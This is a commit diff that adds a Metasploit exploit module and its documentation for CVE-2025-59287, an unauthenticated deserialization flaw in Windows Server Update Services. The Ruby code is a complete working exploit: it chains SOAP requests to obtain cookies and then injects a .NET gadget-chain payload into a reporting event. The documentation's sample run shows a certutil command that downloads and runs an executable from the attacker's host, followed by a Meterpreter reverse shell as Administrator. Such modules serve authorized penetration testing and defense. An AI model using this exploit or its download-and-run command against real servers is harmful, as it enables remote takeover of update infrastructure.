Merge pull request #20674 from msutovsky-r7/exploit/win/cve-2025-59287

dledda-r7 · web-flow · commit c007d3a89f37 · 2025-11-12T12:40:32.000+01:00
Adds module for unauthenticated deserialization in WSUS (CVE-2025-59287)
diff --git a/documentation/modules/exploit/windows/http/wsus_deserialization_rce.md b/documentation/modules/exploit/windows/http/wsus_deserialization_rce.md
@@ -0,0 +1,58 @@
+## Vulnerable Application
+
+Provides features for managing and distributing updates through a management console.
+The [CVE-2025-59287](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-59287) is a remote code execution vulnerability in
+this component that allows an unauthenticated attacker to create a specially crafted event that gets unsafely deserialized upon server sync.
+One way to run synchronization is to open the `Windows Server Update Service` app,
+the other is to run the following command from PowerShell:
+
+`(Get-WsusServer).GetSubscription().GetLastSynchronizationInfo()`
+
+- Windows Server 2012 - fixed in version **6.2.9200.25728**
+- Windows Server 2016 - fixed in version **10.0.14393.8524**
+- Windows Server 2025 - fixed in version **10.0.26100.6905**
+
+## Verification Steps
+
+1. Setup WSUS on target server
+1. Do: `use exploit/windows/http/wsus_deserialization_rce`
+1. Do: `set RHOSTS [target IP]`
+1. Do: `set LHOST [attacker IP]`
+1. Do: `set LPORT [attacker port]`
+1. Do: `run`
+
+## Options
+
+
+## Scenarios
+
+```
+msf exploit(windows/http/wsus_deserialization_rce) > run verbose=true
+[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.7:8080/g7dX6dKZEs4KZYEuEJH2KQ %TEMP%\nYFKgDXL.exe & start /B %TEMP%\nYFKgDXL.exe
+[*] Fetch handler listening on 192.168.3.7:8080
+[*] HTTP server started
+[*] Adding resource /g7dX6dKZEs4KZYEuEJH2KQ
+[*] Started reverse TCP handler on 192.168.3.7:4444 
+[*] Getting server ID
+[*] Getting authentication cookie
+[*] Getting reporting cookie
+[*] Trying to create malicious event
+[*] Created malicious event, now waiting for WSUS to sync
+[*] Client 10.5.132.161 requested /g7dX6dKZEs4KZYEuEJH2KQ
+[*] Sending payload to 10.5.132.161 (Microsoft-CryptoAPI/10.0)
+[*] Client 10.5.132.161 requested /g7dX6dKZEs4KZYEuEJH2KQ
+[*] Sending payload to 10.5.132.161 (CertUtil URL Agent)
+[*] Sending stage (230982 bytes) to 10.5.132.161
+[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.161:49984) at 2025-11-04 12:27:00 +0100
+
+meterpreter > sysinfo
+Computer        : WIN2022__63DA
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: WIN2022__63DA\Administrator
+```
diff --git a/modules/exploits/windows/http/wsus_deserialization_rce.rb b/modules/exploits/windows/http/wsus_deserialization_rce.rb
@@ -0,0 +1,220 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Exploit::Remote::HttpClient
+  include Msf::Util::DotNetDeserialization
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Server Update Service Deserialization Remote Code Execution',
+        'Description' => %q{
+          This module exploits deserialization vulnerability in legacy serialization mechanism in Windows Server Update Services (WSUS). The vulnerability allows unauthenticated attacker to create specially crafted event, which triggers unsafe deserialization upon server synchronization. The module does not require any other options and upon successful exploitation, the payload is executed in context of administrator.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'mwulftange', # security research
+          'msutovsky-r7' # module development
+        ],
+        'References' => [
+          [ 'ATT&CK', Mitre::Attack::Technique::T1190_EXPLOIT_PUBLIC_FACING_APPLICATION],
+          [ 'URL', 'https://code-white.com/blog/wsus-cve-2025-59287-analysis/'],
+          [ 'CVE', '2025-59287']
+        ],
+        'Arch' => ARCH_CMD,
+        'Platform' => 'win',
+        'DefaultOptions' => {
+          'RPORT' => '8530',
+          'WfsDelay' => 900 # need to wait for WSUS to try synchronize
+        },
+        'Targets' => [
+          [ 'Windows', {}]
+        ],
+
+        'DisclosureDate' => '2025-10-14',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
+        }
+      )
+    )
+  end
+
+  def get_soap_response_xml(path, soap_action, data)
+    res = send_request_cgi({
+      'uri' => path,
+      'method' => 'POST',
+      'headers' => {
+        'SOAPAction' => soap_action
+      },
+      'ctype' => 'text/xml',
+      'data' => data
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Received unexpected response from WSUS') unless res&.code == 200
+    xml = res.get_xml_document
+    xml.remove_namespaces!
+    xml
+  end
+
+  def get_server_id
+    soap_body = <<~XML
+      <?xml version="1.0" encoding="utf-8"?>
+      <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+      <soap:Body>
+      <GetRollupConfiguration xmlns="http://www.microsoft.com/SoftwareDistribution">
+      <cookie xmlns:i="http://www.w3.org/2001/XMLSchema-instance" i:nil="true"/>
+      </GetRollupConfiguration>
+      </soap:Body>
+      </soap:Envelope>
+    XML
+
+    xml = get_soap_response_xml(normalize_uri('ReportingWebService', 'ReportingWebService.asmx'), 'http://www.microsoft.com/SoftwareDistribution/GetRollupConfiguration', soap_body)
+
+    @server_id = xml.xpath('//ServerId').text.to_s
+
+    fail_with(Failure::Unknown, 'Failed to get server ID') unless @server_id
+  end
+
+  def get_auth_cookie
+    soap_body = <<~XML
+      <?xml version="1.0" encoding="utf-8"?>
+      <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+      <soap:Body>
+      <GetAuthorizationCookie xmlns="http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService">
+      <clientId>#{@server_id}</clientId>
+      <targetGroupName></targetGroupName>
+      <dnsName>#{Rex::Text.rand_text_alpha_lower(4..8)}</dnsName>
+      </GetAuthorizationCookie>
+      </soap:Body>
+      </soap:Envelope>
+    XML
+
+    xml = get_soap_response_xml(normalize_uri('SimpleAuthWebService', 'SimpleAuth.asmx'), 'http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService/GetAuthorizationCookie', soap_body)
+
+    @auth_cookie = xml.xpath('//CookieData').text.to_s
+    @plugin_id = xml.xpath('//PlugInId').text.to_s
+    fail_with(Failure::Unknown, 'Failed to get authentication cookie') unless @auth_cookie && @plugin_id
+  end
+
+  def get_reporting_parameters
+    timenow = Time.now.strftime('%Y-%m-%dT%H:%M:%SZ')
+
+    soap_body = <<~XML
+      <?xml version="1.0" encoding="utf-8"?>
+      <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+      <soap:Body>
+      <GetCookie xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService">
+      <authCookies>
+      <AuthorizationCookie>
+      <PlugInId>#{@plugin_id}</PlugInId>
+      <CookieData>#{@auth_cookie}</CookieData>
+      </AuthorizationCookie>
+      </authCookies>
+      <oldCookie xmlns:i="http://www.w3.org/2001/XMLSchema-instance" i:nil="true"/>
+      <lastChange>#{timenow}</lastChange>
+      <currentTime>#{timenow}</currentTime>
+      <protocolVersion>1.20</protocolVersion>
+      </GetCookie>
+      </soap:Body>
+      </soap:Envelope>
+    XML
+
+    xml = get_soap_response_xml(normalize_uri('ClientWebService', 'Client.asmx'), 'http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetCookie', soap_body)
+
+    @encrypted_data = xml.xpath('//EncryptedData').text.to_s
+    @expiration = xml.xpath('//Expiration').text.to_s
+
+    fail_with(Failure::Unknown, 'Failed to get reporting parameters') unless @encrypted_data && @expiration
+  end
+
+  def create_malicious_event
+    timenow = Time.now.strftime('%Y-%m-%dT%H:%M:%SZ')
+    payload_data = ::Msf::Util::DotNetDeserialization.generate(
+      payload.encoded,
+      gadget_chain: :WindowsIdentity,
+      formatter: :SoapFormatter
+    )
+
+    soap_body = <<~XML
+      <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
+      <soap:Body>
+      <ReportEventBatch xmlns="http://www.microsoft.com/SoftwareDistribution">
+      <cookie>
+      <Expiration>#{@expiration}</Expiration>
+      <EncryptedData>#{@encrypted_data}</EncryptedData>
+      </cookie>
+      <clientTime>#{timenow}</clientTime>
+      <eventBatch xmlns:q1="http://www.microsoft.com/SoftwareDistribution" soapenc:arrayType="q1:ReportingEvent[1]">
+      <ReportingEvent>
+      <BasicData>
+      <TargetID>
+      <Sid>#{SecureRandom.uuid.strip}</Sid>
+      </TargetID>
+      <SequenceNumber>0</SequenceNumber>
+      <TimeAtTarget>#{timenow}</TimeAtTarget>
+      <EventInstanceID>#{SecureRandom.uuid.strip}</EventInstanceID>
+      <NamespaceID>2</NamespaceID>
+      <EventID>389</EventID>
+      <SourceID>301</SourceID>
+      <UpdateID>
+      <UpdateID>#{SecureRandom.uuid.strip}</UpdateID>
+      <RevisionNumber>0</RevisionNumber>
+      </UpdateID>
+      <Win32HResult>0</Win32HResult>
+      <AppName>#{Rex::Text.rand_text_alpha_lower(4..8)}</AppName>
+      </BasicData>
+      <ExtendedData>
+      <MiscData soapenc:arrayType="xsd:string[2]">
+      <string>Administrator=SYSTEM</string>
+      <string>SynchronizationUpdateErrorsKey=#{Rex::Text.html_encode(payload_data)}</string>
+      </MiscData>
+      </ExtendedData>
+      <PrivateData>
+      <ComputerDnsName></ComputerDnsName>
+      <UserAccountName></UserAccountName>
+      </PrivateData>
+      </ReportingEvent>
+      </eventBatch>
+      </ReportEventBatch>
+      </soap:Body>
+      </soap:Envelope>
+    XML
+
+    xml = get_soap_response_xml(normalize_uri('ReportingWebService', 'ReportingWebService.asmx'), 'http://www.microsoft.com/SoftwareDistribution/ReportEventBatch', soap_body)
+
+    fail_with(Failure::PayloadFailed, 'Failed to create malicious report, target might be not vulnerable') unless xml.xpath('//ReportEventBatchResult').text.to_s == 'true'
+  end
+
+  ##
+  # Could not find better way to check if target is running vulnerable WSUS, leaving it for now with checking for presence of WSUS
+  ##
+  def check
+    res = send_request_cgi({
+      'method' => 'GET'
+    })
+    return CheckCode::Safe('Target does not run WSUS') unless res&.code == 200 && res.headers['Server'] == 'Microsoft-IIS/10.0'
+
+    CheckCode::Detected('Target is probably running WSUS')
+  end
+
+  def exploit
+    vprint_status('Getting server ID')
+    get_server_id
+    vprint_status('Getting authentication cookie')
+    get_auth_cookie
+    vprint_status('Getting reporting cookie')
+    get_reporting_parameters
+    vprint_status('Trying to create malicious event')
+    create_malicious_event
+    vprint_status('Created malicious event, now waiting for WSUS to sync')
+  end
+end
